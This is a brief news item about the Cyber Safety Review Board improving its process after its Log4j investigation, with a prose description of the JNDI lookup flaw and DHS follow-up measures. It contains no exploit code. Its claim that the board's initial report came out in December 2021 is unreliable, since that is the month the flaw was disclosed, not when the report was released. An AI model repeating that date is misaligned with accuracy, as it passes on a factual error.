Process improvement

Cyber Safety Review Board Improving Processes Following Log4j Investigation

The Cyber Safety Review Board is enhancing its investigation process using lessons learned from its Log4j vulnerability probe.

During the Black Hat cybersecurity conference, CSRB Chair Rob Silvers, who is also the undersecretary of homeland security for strategy, policy and plans, acknowledged how the initial review of the vulnerability demonstrated the effectiveness of the concept behind the board’s work but noted that more actions are needed to further refine the assessment process. CSRB’s plan includes creating crowdsourced lists on GitHub that contain products using the vulnerable code on Log4j, SC Media reported.

CSRB released its initial report on the Log4j flaw in December 2021. According to the document, the vulnerability in the Java-based logging framework developed by Apache Software Foundation resulted from the addition of the Java Naming and Directory Interface lookup plug-in support. JNDI features used in the configuration, log messages and parameters do not protect against attacker-controlled Lightweight Directory Access Protocol and other JNDI-related endpoints, meaning bad actors can inject fraudulent messages that enable arbitrary code execution and exploitation of a vulnerable system.

The report stated that the Log4j flaw is an endemic vulnerability that will “remain in systems for many years to come.”

According to Silvers, the Department of Homeland Security is already working to implement some recommendations to address the Log4j issue, including allowing IT personnel to allot time to maintain open-source software projects and collaborating with educational institutions to make cybersecurity a priority in their computer science degree courses.